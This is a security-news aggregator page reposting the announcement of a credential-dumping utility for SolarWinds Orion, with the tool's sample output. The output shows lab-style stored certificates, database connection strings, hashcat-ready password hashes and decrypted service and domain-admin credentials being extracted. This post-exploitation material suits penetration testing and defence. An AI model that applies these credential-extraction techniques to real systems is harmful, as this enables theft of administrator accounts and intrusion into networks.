Ausnahme gefangen: SSL certificate problem: certificate is not yet valid ๐Ÿ“Œ Solarflare - SolarWinds Orion Account Audit / Password Dumping Utility
Team IT Security Nachrichtenportal Logo

๐Ÿ  Team IT Security News

TSecurity.de ist eine Online-Plattform, die sich auf die Bereitstellung von Informationen,alle 15 Minuten neuste Nachrichten, Bildungsressourcen und Dienstleistungen rund um das Thema IT-Sicherheit spezialisiert hat.
Ob es sich um aktuelle Nachrichten, Fachartikel, Blogbeitrรคge, Webinare, Tutorials, oder Tipps & Tricks handelt, TSecurity.de bietet seinen Nutzern einen umfassenden รœberblick รผber die wichtigsten Aspekte der IT-Sicherheit in einer sich stรคndig verรคndernden digitalen Welt.

16.12.2023 - TIP: Wer den Cookie Consent Banner akzeptiert, kann z.B. von Englisch nach Deutsch รผbersetzen, erst Englisch auswรคhlen dann wieder Deutsch!

Google Android Playstore Download Button fรผr Team IT Security
RSS Feed Symbol fรผr Team IT Security 800+ IT News als RSS Feed abonnieren



๐Ÿ“š Solarflare - SolarWinds Orion Account Audit / Password Dumping Utility


๐Ÿ’ก Newskategorie: IT Security Nachrichten
๐Ÿ”— Quelle: feedproxy.google.com


Credential Dumping Tool for SolarWinds Orion

Blog post: https://malicious.link/post/2020/solarflare-release-password-dumper-for-solarwinds-orion/


Credit to @asolino, @gentilkiwi, and @skelsec for helping me figuring out DPAPI.

============================================
| Collecting RabbitMQ Erlang Cookie
|       Erlang Cookie: abcdefg12456789abcde
============================================
| Collecting SolarWinds Certificate
|       SolarWinds Orion Certificate Found!
|       Subject Name: CN=SolarWinds-Orion
|       Thumbprint  : BE85C6C3AACA8840E166187B6AB8C6BA9DA8DE80
|       Password    : alcvabkajp4
|       Private Key : MIIKHwIBAzCCCd8GCSqGSIb3DQEHAaCCCdAEggn<snip>
============================================
| Collecting Default.DAT file
|       Encrypted: 01000000D08C9DDF0115D<snip>
|       Decrypted: 5D3CE5B08C9201E636BCF<snip>
============================================
| Collecting Database Credentials          |
|       Path to SWNetPerfMon.DB is: C:\Program Files (x86)\SolarWinds\Orion\SWNetPerfMon.DB
|       Connection String: Server=(local)\SOLARWINDS_ORION;Database=SolarWindsOrion;User ID=SolarWindsOrionDatabaseUser;Password=SUPERSECRETPASSWORDHERE
|       Number of database credentials found: 1
============================================
| Connecting to the Database              |
|       Successfully connected to: Server=(local)\SOLARWINDS_ORION;Database=SolarWindsOrion;User ID=SolarWindsOrionDatabaseUser;MultipleActiveResultSets=true
============================================
| DB - Exporting Key Table                 |
|       KeyID: 1
|       Encrypted Key: LmjknGhSXTC<snip>
|       Kind: Aes256
|       Purpose: master
|       Protection Type: 1
|       Protection Value: BE85C6C3AACA8<snip>
|       Protection Detai   ls: {}
------------------------------------------------
|       KeyID: 2
|       Encrypted Key: //pj6a4FaCyfv/Rgs<snip>
|       Kind: Aes256
|       Purpose: oldcryptohelper
|       Protection Type: 0
|       Protection Value: 1
|       Protection Details: {"IV":"oj3JCT7Cft<snip>"}
============================================
| DB - Exporting Accounts Table            |
|        Account: _system
|        Password Hash: qE9ClH<snip>
|        Password Salt: XgtO8XNWc/KiIdglGOnxvw==
|        Hashcat Mode 12501: $solarwinds$1$XgtO8XNWc/KiIdglGOnxvw==$qE9ClHDI<snip>
|        Account Enabled: Y
|        Allow Admin: Y
|        Last Login: 12/15/2020
--------------------------------------------
|        Account: Admin
|        Password Hash: IfAEwA7LXxOAH7ORCG0ZYeq<snip>
|        Passwor   d Salt: jNhn3i2XtHfY8y4EOmNdiQ==
|        Hashcat Mode 12501: $solarwinds$1$jNhn3i2XtHfY8y4EOmNdiQ==$IfAEwA7LXxOAH7ORCG0ZY<snip>
|        Account Enabled: Y
|        Allow Admin: Y
|        Last Login: 12/02/2020
--------------------------------------------
|        Account: Guest
|        Password Hash: Y/EMuOWMNfCd<snip>
|        Salt is NULL in DB so lowercase username is used: guest
|        Hashcat Mode 12500: $solarwinds$0$guest$Y/EMuOWMNfCd<snip>
|        Account Enabled: N
|        Allow Admin: N
|        Last Login: 12/30/1899
--------------------------------------------
|        Account: iprequest
|        Password Hash: 7zskGWFukuHuwQ<snip>
|        Salt is NULL in DB so lowercase username is used: iprequest
|        Hashcat Mode 12500: $solarwinds$0$iprequest$7zskGWFukuHuwQ<snip>
|        Account Enabled: Y
|        Allow Admin: N
|        Last Login: 01/01/1900<   br/>--------------------------------------------
|        Account: SITTINGDUCK\uberolduser
|        Password: 11-417578424799297-9-6260697430795685763067724
|        Decoded Password: ASDQWE123
|        Hashcat Mode 21500: $solarwinds$0$admin$fF1lrlOXfxVz51Etjcs18XNK+Zt3keV2AllH9cYtGzdt5Yg2TtcsU84G9+5VVFMIUorR5eNJzX/1kmef6wZfrg==
|        Account Enabled: Y
|        Allow Admin: N
|        Last Login: 11/15/2015
|        Account SID: S-1-5-21-1000000000-2000000000-3000000000-50000
|        Group: SITTINGDUCK\Domain Admins
--------------------------------------------
============================================
| DB - Exporting Credentials Table         |
------------------1--------------------------
| Type: SolarWinds.Orion.Core.SharedCredentials.Credentials.UsernamePasswordCredential
| Name: _system
|       Desc: Cortex Integration
|       Owner: CORE
|               Password: 9dM-5pH/&amp;Y(KU-v
|                  Username: _system
------------------1--------------------------
------------------2--------------------------
| Type: SolarWinds.Orion.Core.SharedCredentials.Credentials.UsernamePasswordCredential
| Name: JobEngine
|       Desc: Job Engine router TCP endpoint credentials
|       Owner: JobEngine
|               Password: +fBByxJFsK+da6ZN2wKvLTKC/PWUzFlfIvvwtW/XqvA=
|               Username: KWPPhiYJmE8+fRF6qlkxulK2tf3t79TQOAk1ywBMVOI=
------------------2--------------------------
------------------3--------------------------
| Type: SolarWinds.Orion.Core.Models.Credentials.SnmpCredentialsV2
| Name: public
|       Desc:
|       Owner: Orion
|               Community: public
------------------3--------------------------
------------------4--------------------------
| Type: SolarWinds.Orion.Core.Models.Credentials.Sn   mpCredentialsV2
| Name: private
|       Desc:
|       Owner: Orion
|               Community: private
------------------4--------------------------
------------------5--------------------------
| Type: SolarWinds.Orion.Core.SharedCredentials.Credentials.UsernamePasswordCredential
| Name: Erlang cookie
|       Desc: Erlang clustering cookie
|       Owner: Erlang
|               Password: abcdefg12456789abcde
|               Username: ignored
------------------5--------------------------
------------------6--------------------------
| Type: SolarWinds.Orion.Core.SharedCredentials.Credentials.UsernamePasswordCredential
| Name: RabbitMQ user account
|       Desc: RabbitMQ user account for Message Bus
|       Owner: RabbitMQ
|               Password: LtVmCrzlTNyWmwxpxJMi
|               Username: orion
------------------6--------------------------
------------------7--------------------------
| Ty   pe: SolarWinds.Orion.Core.Models.Credentials.SnmpCredentialsV3
| Name: User: snmpv3user, Context: thisisthecontext
|       Desc:
|       Owner: Orion
|               AuthenticationKeyIsPassword: false
|               AuthenticationPassword: ASDqwe123
|               AuthenticationType: SHA1
|               Context: thisisthecontext
|               PrivacyKeyIsPassword: false
|               PrivacyPassword: ASDqwe123
|               PrivacyType: AES256
|               UserName: snmpv3user
------------------7--------------------------
------------------8--------------------------
| Type: SolarWinds.Orion.Core.Models.Credentials.SnmpCredentialsV3
| Name: User: rootsnmpv3, Context: newcontextv3
|       Desc:
|       Owner: Orion
|               AuthenticationKeyIsPassword: true
|               AuthenticationPassword: ASDqwe123
|               AuthenticationType: MD5
|               Context: newcontextv3   
|               PrivacyKeyIsPassword: true
|               PrivacyPassword: ASDqwe123
|               PrivacyType: AES128
|               UserName: rootsnmpv3
------------------8--------------------------
------------------9--------------------------
| Type: SolarWinds.Orion.Core.SharedCredentials.Credentials.UsernamePasswordCredential
| Name: DomainAdmin
|       Desc:
|       Owner: Orion
|               Password: ASDqwe123
|               Username: SITTINGDUCK\uberuser
------------------9--------------------------
------------------10--------------------------
| Type: SolarWinds.Orion.Core.SharedCredentials.Credentials.UsernamePasswordCredential
| Name: DomainJoiner
|       Desc:
|       Owner: Orion
|               Password: ASDqwe123
|               Username: superadmin@sittingduck.info
------------------10--------------------------
------------------11--------------------------
| Type:    SolarWinds.Orion.Core.SharedCredentials.Credentials.UsernamePasswordCredential
| Name: vesxi
|       Desc: vesxi
|       Owner: VIM
|               Password: ASDqwe123
|               Username: root
------------------11--------------------------
------------------12--------------------------
| Type: SolarWinds.Orion.Core.SharedCredentials.Credentials.ActiveDirectoryCredential
| Name: SITTINGDUCK\uberuser
| 	Desc: 
| 	Owner: Orion
| 		Password: ASDqwe213
| 		Username: SITTINGDUCK\uberuser
------------------12--------------------------
------------------13--------------------------
| Type: SolarWinds.APM.Common.Credentials.ApmUsernamePasswordCredential
| Name: App Monitoring User
| 	Desc: 
| 	Owner: APM
| 		Password: ASDqwe123
| 		Username: SITTINGDUCK\uberuser
------------------13--------------------------
------------------14--------------------------
| Type: SolarWinds.SRM.Common.Credent   ials.SmisCredentials
| Name: EMC_SMIS_Solarwinds
| 	Desc: 
| 	Owner: SRM
| 		HttpPort: 5988
| 		HttpsPort: 5989
| 		InteropNamespace: /interop
| 		Namespace: root/emc
| 		Password: ASDqwe123
| 		Username: solarwinds
| 		UseSSL: true
------------------14--------------------------
------------------15--------------------------
| Type: SolarWinds.ESI.Common.Connection.ExternalSystemCredential
| Name: ESC
| 	Desc: 
| 	Owner: ESI
| 		Password: ASDqwe123
| 		Username: solar_winds
------------------15--------------------------
------------------16--------------------------
| Type: SolarWinds.Orion.Web.Integration.OAuth2Token
| Name: SITTINGDUCK\uberuser
| 	Desc: 
| 	Owner: Web.Integration
| 		AccessToken: GthQHd3<snip>
| 		AccessTokenExpiration: 2020-11-01T10:52:50.2768075Z
| 		AccessTokenIssueDate: 2020-11-01T09:52:51.2768075Z
| 		RefreshToken:hEyph9WqIfzm<snip>
   | 		Scopes: 
| 		Username: uberuser@sittingduck.info
------------------16--------------------------
------------------17--------------------------
| Type: SolarWinds.SRM.Common.Credentials.XtremIoHttpCredential
| Name: XtremIO_Admin
| 	Desc: 
| 	Owner: SRM
| 		HttpPort: 80
| 		HttpsPort: 443
| 		Password: ASDqwe123
| 		Username: admin
| 		UseSsl: true
------------------18--------------------------
============================================
============================================


...



Sharing is caring on Social Media

๐Ÿ”— Reddit
๐Ÿ”— Telegram
๐Ÿ”— LinkedIn
๐Ÿ”— Xing
๐Ÿ”— Twitter
๐Ÿ”— Whatsapp
๐Ÿ”— Facebook
๐Ÿ”— Flipboard

Join the Team IT Security Community

๐Ÿ”— "IT Sicherheit" Reddit-Gruppe
๐Ÿ”— "IT Sicherheit" Telegramm-Seite

๐Ÿ“Œ What is Utility Analysis?|Total Utility and Marginal Utility


๐Ÿ“ˆ 33.55 Punkte

๐Ÿ“Œ Reversing a Security Dongle HID Protocol (now with password dumping) :D


๐Ÿ“ˆ 25.07 Punkte

๐Ÿ“Œ Password Dumping Cheatsheet: Windows


๐Ÿ“ˆ 25.07 Punkte

๐Ÿ“Œ Credential Dumping: Windows Autologon Password


๐Ÿ“ˆ 25.07 Punkte

๐Ÿ“Œ Cloud Security Audit - A Command Line Security Audit Tool For Amazon Web Services


๐Ÿ“ˆ 23.36 Punkte

๐Ÿ“Œ libmail-audit-perl 2.1-5 Logging mail::audit privilege escalation


๐Ÿ“ˆ 23.36 Punkte

๐Ÿ“Œ Low CVE-2017-18560: Content audit project Content audit


๐Ÿ“ˆ 23.36 Punkte

๐Ÿ“Œ Oracle Retail Sales Audit 14.0 Sales Audit Maintenance denial of service


๐Ÿ“ˆ 23.36 Punkte

๐Ÿ“Œ CVE-2022-32074 | osTicket Plugins SVG audit/class.audit.php cross site scripting


๐Ÿ“ˆ 23.36 Punkte

๐Ÿ“Œ Audit the Security Posture of DevOps with HackerOne Code Security Audit


๐Ÿ“ˆ 23.36 Punkte

๐Ÿ“Œ Immuta Unified Audit Model streamlines the filtering and analysis of audit data


๐Ÿ“ˆ 23.36 Punkte

๐Ÿ“Œ Audit Vigilance: Lighting the Way for Audit Analysis - Unleashing the Bat Computer


๐Ÿ“ˆ 23.36 Punkte

๐Ÿ“Œ Softwolves Software Turquoise SuperStat up to 2.2.4 Utility utility.cpp memory corruption


๐Ÿ“ˆ 22.37 Punkte

๐Ÿ“Œ [utility] bkp - simple utility for creating simple backups


๐Ÿ“ˆ 22.37 Punkte

๐Ÿ“Œ [utility] bkp - simple utility for creating simple backups


๐Ÿ“ˆ 22.37 Punkte

๐Ÿ“Œ IDOR User Account Takeover By Connecting My Facebook Account with victims Account


๐Ÿ“ˆ 20.77 Punkte

๐Ÿ“Œ Microsoft hotmail account stolen due to cell phone number identity theft. The ID thief turned on 2FA and now I can't get into my hotmail account. Can Anyone help me recover my hotmail/microsoft account?


๐Ÿ“ˆ 20.77 Punkte

๐Ÿ“Œ Which is more secure: different email (on custom domain) for every account or different (but patterned) password for every account?


๐Ÿ“ˆ 19.88 Punkte

๐Ÿ“Œ Amazon plant Musik-Streaming zum Dumping-Preis


๐Ÿ“ˆ 19.04 Punkte

๐Ÿ“Œ Undocumented Patched Vulnerability in Nexus 5X Allowed for Memory Dumping Via USB


๐Ÿ“ˆ 19.04 Punkte

๐Ÿ“Œ Bugtraq: Google Nexus 5X Bootloader Unauthorized Memory Dumping via USB


๐Ÿ“ˆ 19.04 Punkte

๐Ÿ“Œ Amazon plant Musik-Streaming zum Dumping-Preis


๐Ÿ“ˆ 19.04 Punkte

๐Ÿ“Œ Undocumented Patched Vulnerability in Nexus 5X Allowed for Memory Dumping Via USB


๐Ÿ“ˆ 19.04 Punkte

๐Ÿ“Œ Bugtraq: Google Nexus 5X Bootloader Unauthorized Memory Dumping via USB


๐Ÿ“ˆ 19.04 Punkte

๐Ÿ“Œ Undocumented Patched Vulnerability in Nexus 5X Allowed for Memory Dumping Via USB


๐Ÿ“ˆ 19.04 Punkte

๐Ÿ“Œ Cloudflare Memory Dumping Reverse Proxies


๐Ÿ“ˆ 19.04 Punkte

๐Ÿ“Œ Former Equifax exec charged with stock dumping before breach disclosure


๐Ÿ“ˆ 19.04 Punkte

๐Ÿ“Œ Anti-Dumping: EU-Kommission erhebt Strafzรถlle auf E-Bikes aus China


๐Ÿ“ˆ 19.04 Punkte

๐Ÿ“Œ Credential Dumping Campaign Hits Multinational Corporations


๐Ÿ“ˆ 19.04 Punkte

๐Ÿ“Œ Adidnsdump - Active Directory Integrated DNS Dumping By Any Authenticated User


๐Ÿ“ˆ 19.04 Punkte

๐Ÿ“Œ 5G: Anti-Dumping-Verfahren in EU gegen Huawei mรถglich


๐Ÿ“ˆ 19.04 Punkte

๐Ÿ“Œ Intel Says CEO Dumping Tons of Stock Last Year 'Unrelated' To Big Security Exploit


๐Ÿ“ˆ 19.04 Punkte

๐Ÿ“Œ Investors accuse FedEx of lying, stock dumping after NotPetya attack


๐Ÿ“ˆ 19.04 Punkte

๐Ÿ“Œ Hackers keep dumping Ring credentials online 'for the giggles'


๐Ÿ“ˆ 19.04 Punkte

๐Ÿ“Œ I thought GTK users were crazy, but after Qt's shenanigans it looks like I'm dumping KDE for Gnome


๐Ÿ“ˆ 19.04 Punkte











matomo

Kontakt

24/7 kontakt@tsecurity.de

Weitere Informationen

Google Android Playstore Download Button fรผr Team IT Security
๐Ÿ”— Impressum
๐Ÿ”— Datenschutz
Paypal Spenden fรผr Projekt

Social Media

๐Ÿ”— Facebook
๐Ÿ”— Reddit
๐Ÿ”— Team IT Security als Elektron App
๐Ÿ”— © 2015-2023 Team IT Security Nachrichtenportal รผber Cybersecurity
๐Ÿ”— CMS "myDraft" a PHP Portal Software